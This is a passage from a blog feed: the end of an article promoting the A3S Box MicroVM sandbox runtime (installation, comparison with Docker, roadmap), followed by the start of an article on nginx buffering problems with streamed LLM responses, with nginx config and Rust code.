&lt;span class="c"&gt;# Method 4: Direct binary download (GitHub Releases)&lt;/span&gt;
&lt;span class="c"&gt;# macOS Apple Silicon:&lt;/span&gt;
curl &lt;span class="nt"&gt;-L&lt;/span&gt; https://github.com/A3S-Lab/Box/releases/latest/download/a3s-box-latest-macos-arm64.tar.gz | &lt;span class="nb"&gt;tar &lt;/span&gt;xz
&lt;span class="c"&gt;# Linux x86_64:&lt;/span&gt;
curl &lt;span class="nt"&gt;-L&lt;/span&gt; https://github.com/A3S-Lab/Box/releases/latest/download/a3s-box-latest-linux-x86_64.tar.gz | &lt;span class="nb"&gt;tar &lt;/span&gt;xz
./a3s-box version
&lt;span class="c"&gt;# Extract and use, zero dependencies&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Installation Method&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;th&gt;Install Time&lt;/th&gt;
&lt;th&gt;Dependencies&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Homebrew&lt;/td&gt;
&lt;td&gt;macOS/Linux daily development&lt;/td&gt;
&lt;td&gt;~10 seconds&lt;/td&gt;
&lt;td&gt;Homebrew&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cargo&lt;/td&gt;
&lt;td&gt;Rust developers, source compilation&lt;/td&gt;
&lt;td&gt;~2 minutes&lt;/td&gt;
&lt;td&gt;Rust toolchain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Helm&lt;/td&gt;
&lt;td&gt;Kubernetes cluster deployment&lt;/td&gt;
&lt;td&gt;~30 seconds&lt;/td&gt;
&lt;td&gt;Helm + K8s&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Direct download&lt;/td&gt;
&lt;td&gt;CI/CD, offline environments, edge devices&lt;/td&gt;
&lt;td&gt;~5 seconds&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;For more installation details and configuration options, see the official documentation: &lt;a href="https://a3s-lab.github.io/a3s/" rel="noopener noreferrer"&gt;https://a3s-lab.github.io/a3s/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Compared to Docker Desktop's installation experience (download 1GB -&amp;gt; install -&amp;gt; start daemon -&amp;gt; wait for ready), A3S Box's installation can be summarized in one word: &lt;strong&gt;instant&lt;/strong&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  20.3.7 When to Choose Docker, When to Choose A3S Box?
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Choose Docker when:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Extremely latency-sensitive (P99 &amp;lt; 100ms) and not using warm pool&lt;/li&gt;
&lt;li&gt;Deep integration with Docker API toolchain with high migration cost&lt;/li&gt;
&lt;li&gt;Hardware-level isolation not needed (e.g., internal development environments, trusted workloads)&lt;/li&gt;
&lt;li&gt;Need Docker Compose to orchestrate multi-container applications&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Choose A3S Box when:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Running untrusted code (AI Agents, user-submitted code, third-party plugins)&lt;/li&gt;
&lt;li&gt;Multi-tenant environments requiring strong isolation guarantees&lt;/li&gt;
&lt;li&gt;Processing sensitive data requiring TEE confidential computing&lt;/li&gt;
&lt;li&gt;Need complete audit trail (compliance requirements)&lt;/li&gt;
&lt;li&gt;macOS development environment without wanting to install Docker Desktop&lt;/li&gt;
&lt;li&gt;Edge/IoT deployment requiring minimal binary size&lt;/li&gt;
&lt;li&gt;Need to embed sandbox capability into applications (SDK integration)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  20.4 Scenario Applicability Analysis
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Scenario 1: Development and Testing Environments&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Recommended: A3S Box (TSI mode) or Docker&lt;/p&gt;

&lt;p&gt;A3S Box runs natively on macOS via Apple HVF, so developers don't need to install Docker Desktop. Its 52 Docker-compatible commands make migration cost nearly zero, and the zero-configuration TSI network mode suits rapid iteration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario 2: Multi-Tenant SaaS Platforms&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Recommended: A3S Box (Bridge mode + TEE)&lt;/p&gt;

&lt;p&gt;Multi-tenant scenarios require strong isolation guarantees. A3S Box's hardware virtualization + TEE memory encryption provides the highest level of tenant isolation. Network policies support traffic isolation between tenants. Audit logs meet compliance requirements.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario 3: AI Agent Sandbox Execution&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Recommended: A3S Box (warm pool + SDK)&lt;/p&gt;

&lt;p&gt;AI Agents need to execute untrusted code in isolated environments. A3S Box's SDK provides a unified programming interface for Rust/Python/TypeScript, and the warm pool mechanism eliminates cold start latency. The seven-layer security model ensures that even if Agent-generated code is malicious, it cannot escape the sandbox.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario 4: Confidential Data Processing&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Recommended: A3S Box (TEE mode + sealed storage)&lt;/p&gt;

&lt;p&gt;When processing medical records, financial data, or personal privacy information, TEE mode ensures data remains encrypted throughout processing. RA-TLS provides end-to-end attestation and encrypted communication. Sealed storage ensures persisted data can only be decrypted in trusted environments.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario 5: High-Performance Computing / Low-Latency Services&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Recommended: runc (Docker) or gVisor&lt;/p&gt;

&lt;p&gt;If security isolation is not the primary requirement and latency is extremely sensitive (P99 &amp;lt; 10ms), traditional containers' ~50ms startup time and lower runtime overhead may be more appropriate.&lt;/p&gt;

&lt;h3&gt;
  
  
  20.5 A3S Box's Unique Positioning
&lt;/h3&gt;

&lt;p&gt;From the comparison, A3S Box's unique positioning is:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;The only solution supporting both MicroVM isolation and TEE confidential computing&lt;/strong&gt;: Kata Containers offers some TEE support, but it is less complete than A3S Box's (it lacks RA-TLS, sealed storage, and re-attestation)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The only MicroVM solution with native macOS support&lt;/strong&gt;: Through libkrun + Apple HVF, developers can get an experience on Mac consistent with Linux production environments&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The only MicroVM solution providing three-language SDKs&lt;/strong&gt;: Rust/Python/TypeScript SDKs allow A3S Box to be embedded into applications as a library, not just a command-line tool&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The only MicroVM solution with a built-in complete audit system&lt;/strong&gt;: 26 audit operations, W7 model, pluggable backend&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  21. Future Outlook and Summary
&lt;/h2&gt;

&lt;h3&gt;
  
  
  21.1 Technical Evolution Roadmap
&lt;/h3&gt;

&lt;p&gt;A3S Box's technical evolution revolves around three directions:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Direction 1: Expand TEE Hardware Support&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A3S Box currently fully supports AMD SEV-SNP. Intel TDX (Trust Domain Extensions) support is reserved in the architecture (the &lt;code&gt;TeeConfig::Tdx&lt;/code&gt; variant is already defined) and will be implemented when Intel server platforms are more widely deployed. The project will also track emerging confidential computing standards such as ARM CCA (Confidential Compute Architecture).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Direction 2: Enhanced Network Policy Enforcement&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The current network policies (&lt;code&gt;IsolationMode::Strict&lt;/code&gt; and &lt;code&gt;Custom&lt;/code&gt;) are fully defined in the data model, but runtime enforcement is not yet implemented. Future work will implement true network policy enforcement via iptables/nftables integration, supporting:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Fine-grained traffic control between MicroVMs&lt;/li&gt;
&lt;li&gt;Label-based network segmentation&lt;/li&gt;
&lt;li&gt;Port-level filtering of inbound/outbound traffic&lt;/li&gt;
&lt;li&gt;Semantic alignment with Kubernetes NetworkPolicy&lt;/li&gt;
&lt;/ul&gt;
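&lt;p&gt;The allow/deny decision at the heart of such a policy engine can be sketched as a pure function. Everything below (the &lt;code&gt;PolicyRule&lt;/code&gt; shape, field names) is an illustrative assumption, not A3S Box's actual data model:&lt;/p&gt;

```rust
use std::collections::HashSet;

// Illustrative rule: allow traffic from VMs carrying a label to a set
// of destination ports. A hypothetical shape, not the real A3S model.
struct PolicyRule {
    from_label: String,
    allowed_ports: HashSet<u16>,
}

// Default-deny, mirroring Kubernetes NetworkPolicy semantics:
// traffic passes only if some rule explicitly matches it.
fn is_allowed(rules: &[PolicyRule], src_labels: &HashSet<String>, dst_port: u16) -> bool {
    rules.iter().any(|r| {
        src_labels.contains(&r.from_label) && r.allowed_ports.contains(&dst_port)
    })
}

fn main() {
    let rules = vec![PolicyRule {
        from_label: "tenant-a".to_string(),
        allowed_ports: [80u16, 443].into_iter().collect(),
    }];
    let src: HashSet<String> = ["tenant-a".to_string()].into_iter().collect();
    println!("443 from tenant-a: {}", is_allowed(&rules, &src, 443));
    println!("22 from tenant-a:  {}", is_allowed(&rules, &src, 22));
}
```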

&lt;p&gt;&lt;strong&gt;Direction 3: Deepening Security Capabilities&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Custom Seccomp profiles&lt;/strong&gt;: Currently supports &lt;code&gt;Default&lt;/code&gt; and &lt;code&gt;Unconfined&lt;/code&gt; modes; a future release will add a &lt;code&gt;Custom&lt;/code&gt; mode that lets users supply their own Seccomp BPF profiles&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AppArmor / SELinux integration&lt;/strong&gt;: The CLI currently parses these options but does not enforce them; full MAC (Mandatory Access Control) integration is planned&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mandatory image signature verification&lt;/strong&gt;: The signature verification framework is ready (&lt;code&gt;SignaturePolicy&lt;/code&gt;, &lt;code&gt;VerifyResult&lt;/code&gt;); integration with the Sigstore/cosign ecosystem is planned&lt;/li&gt;
&lt;/ul&gt;
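&lt;p&gt;To make the signature item concrete, here is how a policy gate like this typically decides whether an image may run. The enum shapes below are assumptions for illustration; the real &lt;code&gt;SignaturePolicy&lt;/code&gt; and &lt;code&gt;VerifyResult&lt;/code&gt; types in A3S Box may differ:&lt;/p&gt;

```rust
// Illustrative shapes; the actual A3S types may differ.
enum SignaturePolicy {
    Disabled,   // run anything, no verification
    Permissive, // run unsigned images, but reject tampered ones
    Enforced,   // only run images with a valid signature
}

enum VerifyResult {
    Verified,
    Unsigned,
    BadSignature,
}

fn may_run(policy: &SignaturePolicy, result: &VerifyResult) -> bool {
    match (policy, result) {
        // No verification requested at all
        (SignaturePolicy::Disabled, _) => true,
        // A bad signature indicates tampering, not just a missing
        // signature, so even permissive mode rejects it
        (_, VerifyResult::BadSignature) => false,
        (SignaturePolicy::Permissive, _) => true,
        (SignaturePolicy::Enforced, VerifyResult::Verified) => true,
        (SignaturePolicy::Enforced, _) => false,
    }
}

fn main() {
    println!("{}", may_run(&SignaturePolicy::Enforced, &VerifyResult::Unsigned));
    println!("{}", may_run(&SignaturePolicy::Permissive, &VerifyResult::Unsigned));
}
```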

&lt;h3&gt;
  
  
  21.2 Ecosystem Expansion
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;OCI image building&lt;/strong&gt;: The &lt;code&gt;a3s-box build&lt;/code&gt; command is reserved behind a feature gate and will support building OCI images inside MicroVMs — meaning the build process itself is protected by hardware isolation, preventing malicious Dockerfiles from attacking the host.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Kubernetes Operator maturation&lt;/strong&gt;: The current &lt;code&gt;BoxAutoscaler&lt;/code&gt; CRD is at the &lt;code&gt;v1alpha1&lt;/code&gt; stage and will progressively evolve to &lt;code&gt;v1beta1&lt;/code&gt; and &lt;code&gt;v1&lt;/code&gt;, adding more automated operations capabilities:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Rolling update strategies&lt;/li&gt;
&lt;li&gt;Canary releases&lt;/li&gt;
&lt;li&gt;Automatic failure recovery&lt;/li&gt;
&lt;li&gt;Cross-availability-zone scheduling&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Observability enhancements&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;More granular Prometheus metrics (network I/O, disk I/O, vsock latency)&lt;/li&gt;
&lt;li&gt;Built-in Grafana dashboard templates&lt;/li&gt;
&lt;li&gt;Real-time streaming of audit events (WebSocket / gRPC stream)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  21.3 Performance Optimization Directions
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Startup time optimization&lt;/strong&gt;: Although 200ms cold start is already fast, there is still room for optimization:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Kernel trimming: Remove kernel modules not needed by MicroVMs, reducing kernel boot time&lt;/li&gt;
&lt;li&gt;Snapshot restore: Save initialized VM snapshots, restore from snapshot rather than starting from scratch&lt;/li&gt;
&lt;li&gt;Parallel initialization: Guest Init's steps execute in parallel where possible&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Memory optimization&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;KSM (Kernel Same-page Merging): When multiple MicroVMs run the same image, share identical memory pages&lt;/li&gt;
&lt;li&gt;Memory balloon: Dynamically adjust VM memory allocation, reclaim unused memory&lt;/li&gt;
&lt;li&gt;Lazy memory allocation: Only allocate physical memory pages when the VM actually accesses them&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  21.4 Summary
&lt;/h3&gt;

&lt;p&gt;A3S Box represents a paradigm shift in container runtimes. It doesn't patch existing container technology, but starts from the fundamental question "what is the essence of workload isolation" and arrives at a clear answer:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Every workload should run on its own operating system kernel, with hardware virtualization providing isolation guarantees, confidential computing providing data protection, while maintaining container-level startup speed and developer experience.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The realization of this answer depends on several key technical choices:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;libkrun as VMM&lt;/strong&gt;: Library-form embedding, native macOS/Linux dual-platform support, ~200ms cold start&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rust as implementation language&lt;/strong&gt;: Memory safety, zero-cost abstractions, cross-platform compilation, PyO3/napi-rs ecosystem&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Minimal core + external extensions architecture&lt;/strong&gt;: 5 core components remain stable, 14 extension points can evolve independently&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Seven-layer defense in depth&lt;/strong&gt;: From hardware encryption to syscall filtering, each layer independently increases attack cost&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Docker-compatible user experience&lt;/strong&gt;: 52 commands, zero migration cost&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A3S Box's 1,466 tests (covering 218 source files) ensure the correct implementation of these technical choices. And its modular design — seven crates each with their own responsibilities, loosely coupled through Trait interfaces — ensures the system can continue to evolve without losing control.&lt;/p&gt;

&lt;p&gt;In the AI Agent era, a secure code execution environment is no longer optional but foundational infrastructure. A3S Box is the runtime built for this era — it runs every line of untrusted code in a hardware-isolated sandbox, protects every byte of sensitive data with hardware encryption, while making developers feel like they're using Docker.&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;A3S Box — Making security the default, not the option.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Documentation: &lt;a href="https://a3s-lab.github.io/a3s/" rel="noopener noreferrer"&gt;https://a3s-lab.github.io/a3s/&lt;/a&gt; | GitHub: &lt;a href="https://github.com/A3S-Lab/Box" rel="noopener noreferrer"&gt;https://github.com/A3S-Lab/Box&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>microvm</category>
      <category>tee</category>
    </item>
    <item>
      <title>Your nginx Is Killing Your AI Service — Why You Need to Redesign the Traffic Layer</title>
      <dc:creator>Roy Lin</dc:creator>
      <pubDate>Mon, 23 Feb 2026 18:46:51 +0000</pubDate>
      <link>https://forem.com/roylin/your-nginx-is-killing-your-ai-service-why-you-need-to-redesign-the-traffic-layer-1go2</link>
      <guid>https://forem.com/roylin/your-nginx-is-killing-your-ai-service-why-you-need-to-redesign-the-traffic-layer-1go2</guid>
      <description>&lt;p&gt;Four numbers define the problem this article addresses:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;3 seconds&lt;/strong&gt;: The maximum wait time users can tolerate — churn spikes sharply beyond this threshold.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;47 seconds&lt;/strong&gt;: The median time for a 70B model to complete a full inference pass on an A100.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;0.3 seconds&lt;/strong&gt;: The time for that same model to output its first token.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;$2.48&lt;/strong&gt;: The on-demand price of one A100 GPU per hour. If it sits idle at 3 AM, that money is gone.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The tension between these four numbers is the most fundamental engineering problem in AI infrastructure: &lt;strong&gt;users demand instant responses, models need time to think, compute must be precisely scheduled — and the traditional traffic layer knows nothing about any of this.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;The Life of a Request: What nginx Is Doing&lt;/li&gt;
&lt;li&gt;Fault Line 1: A Response Is Not a Packet, It Is a River&lt;/li&gt;
&lt;li&gt;Fault Line 2: The Backend May Not Exist Yet&lt;/li&gt;
&lt;li&gt;Fault Line 3: You Never Know If the New Model Got Dumber&lt;/li&gt;
&lt;li&gt;Fault Line 4: Connections Are Not Disposable&lt;/li&gt;
&lt;li&gt;Fault Line 5: Inference Fails Differently Than HTTP 500&lt;/li&gt;
&lt;li&gt;Redesigning: What an AI Traffic Layer Needs&lt;/li&gt;
&lt;li&gt;How A3S Gateway Addresses the Five Fault Lines&lt;/li&gt;
&lt;li&gt;A Real Comparison With Existing Solutions&lt;/li&gt;
&lt;li&gt;In Practice: Configuring a Full Proxy for an AI Backend&lt;/li&gt;
&lt;li&gt;Autoscaling: The Principles Behind the Numbers&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  1. The Life of a Request: What nginx Is Doing
&lt;/h2&gt;

&lt;p&gt;Let us start with the most basic question: when a request enters nginx, what is nginx actually doing?&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client  ──→  nginx  ──→  Backend  ──→  nginx  ──→  Client
               ↑                          ↑
       Receives full response       Forwards to client
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The core model of nginx is &lt;strong&gt;proxy buffering&lt;/strong&gt;. Its default behavior is:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Receive the complete response body from upstream&lt;/li&gt;
&lt;li&gt;Cache it to local memory or a temporary file&lt;/li&gt;
&lt;li&gt;Then send the cached content to the client&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This design made perfect sense in 2004. HTTP responses were static files, database query results, template rendering output — they were complete at the moment of generation, and only needed a buffer to handle client network jitter.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;But LLM responses do not work that way.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;An LLM inference server behaves more like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Backend (vLLM / llama.cpp):
  t=0ms:     Receives request, begins inference
  t=300ms:   Generates first token: "Of"
  t=400ms:   Generates second token: "course"
  t=500ms:   Generates third token: ","
  ...
  t=47000ms: Generates last token, inference complete
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If nginx has proxy buffering enabled (the default), what the user sees is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User side:
  t=0ms:     Sends request
  t=47300ms: Receives all 4096 tokens at once
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;47 seconds of blank screen. Then text cascades down all at once.&lt;/p&gt;

&lt;p&gt;The user has already closed the tab.&lt;/p&gt;

&lt;p&gt;nginx does provide a way to disable buffering: &lt;code&gt;proxy_buffering off&lt;/code&gt;. But that is just the beginning — when you actually run AI services in production, you will find this is the easiest of the five fault lines to solve.&lt;/p&gt;
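&lt;p&gt;For reference, the nginx-side fix usually looks like the following. The directives are real nginx directives; the timeout values are illustrative, not recommendations:&lt;/p&gt;

```nginx
location /v1/chat/completions {
    proxy_pass http://llm_backend;

    # Stream tokens as they arrive instead of buffering the full body
    proxy_buffering off;
    proxy_cache off;

    # SSE connections stay open for the whole generation; the default
    # 60s read timeout would cut a long inference short
    proxy_read_timeout 3600s;
    proxy_send_timeout 3600s;

    # Keep the upstream connection on HTTP/1.1 without Connection: close
    proxy_http_version 1.1;
    proxy_set_header Connection "";
}
```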




&lt;h2&gt;
  
  
  2. Fault Line 1: A Response Is Not a Packet, It Is a River
&lt;/h2&gt;

&lt;p&gt;After turning off proxy buffering, streaming appears to be solved. But the word "streaming" hides a lot of detail.&lt;/p&gt;

&lt;p&gt;SSE (Server-Sent Events) is the standard protocol for LLM streaming output. A well-formed SSE stream looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;data: {"id":"chatcmpl-xxx","choices":[{"delta":{"content":"Of"},"index":0}]}

data: {"id":"chatcmpl-xxx","choices":[{"delta":{"content":" course"},"index":0}]}

data: [DONE]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each line is an event, separated by two newlines. The problem is: TCP does not guarantee packet boundaries. Under high concurrency, the network stack may merge multiple SSE events into one TCP packet, or split one event across multiple packets.&lt;/p&gt;
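&lt;p&gt;Any component that wants to operate on whole SSE events therefore has to reassemble them itself, accumulating bytes until it sees the blank-line separator. A minimal sketch of that splitter:&lt;/p&gt;

```rust
// Incremental SSE event splitter: feed it arbitrary chunks (merged or
// split by TCP) and get back only complete, "\n\n"-terminated events.
struct SseSplitter {
    buf: String,
}

impl SseSplitter {
    fn new() -> Self {
        SseSplitter { buf: String::new() }
    }

    // Append a chunk and drain every complete event found so far.
    fn push(&mut self, chunk: &str) -> Vec<String> {
        self.buf.push_str(chunk);
        let mut events = Vec::new();
        while let Some(pos) = self.buf.find("\n\n") {
            let event = self.buf[..pos].to_string();
            self.buf = self.buf[pos + 2..].to_string();
            events.push(event);
        }
        events
    }
}

fn main() {
    let mut splitter = SseSplitter::new();
    // Two events merged into one TCP packet...
    let merged = splitter.push("data: {\"a\":1}\n\ndata: {\"b\":2}\n\n");
    assert_eq!(merged.len(), 2);
    // ...and one event split across two packets.
    assert!(splitter.push("data: [DO").is_empty());
    let rest = splitter.push("NE]\n\n");
    assert_eq!(rest, vec!["data: [DONE]".to_string()]);
    println!("ok");
}
```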

&lt;p&gt;What an nginx with "proxy buffering off" does is: forward the bytes received from upstream as-is. This works in most cases, but:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Connection keepalive&lt;/strong&gt;: nginx needs to know when one response ends and the next begins. For regular HTTP, this is controlled by &lt;code&gt;Content-Length&lt;/code&gt; or &lt;code&gt;Transfer-Encoding: chunked&lt;/code&gt;. For SSE, the connection stays open for the entire conversation — nginx's default timeouts may cut the connection while the model is still thinking.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Degradation under memory pressure&lt;/strong&gt;: When nginx's memory pool fills up (say, 500 concurrent streaming requests), it silently re-enables buffering. Your monitoring sees normal 200 responses; users see latency suddenly spike.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Unpredictable response size&lt;/strong&gt;: nginx's &lt;code&gt;proxy_max_temp_file_size&lt;/code&gt; has a default upper limit. A full token stream from a long conversation may exceed it.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;True zero-buffer streaming requires treating streams as a first-class citizen at the design level of the entire proxy layer — not patching a Web proxy after the fact.&lt;/p&gt;

&lt;p&gt;From an implementation perspective, the difference is very concrete:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Zero-buffer SSE forwarding: forward whatever arrives, no accumulation&lt;/span&gt;
&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;forward_streaming&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;upstream&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Response&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;Incoming&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;sender&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;ResponseSender&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="nf"&gt;Some&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;chunk&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;upstream&lt;/span&gt;&lt;span class="nf"&gt;.body_mut&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="nf"&gt;.frame&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="nf"&gt;Ok&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;frame&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;chunk&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// Each frame is sent immediately, without waiting for the next&lt;/span&gt;
            &lt;span class="n"&gt;sender&lt;/span&gt;&lt;span class="nf"&gt;.send_data&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;frame&lt;/span&gt;&lt;span class="nf"&gt;.into_data&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="nf"&gt;.unwrap&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="nf"&gt;.ok&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Contrast this with a buffered proxy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Buffered proxy: wait for everything before sending&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;body_bytes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;hyper&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nn"&gt;body&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;to_bytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;upstream&lt;/span&gt;&lt;span class="nf"&gt;.body_mut&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="c1"&gt;// The user waits here for the entire inference duration&lt;/span&gt;
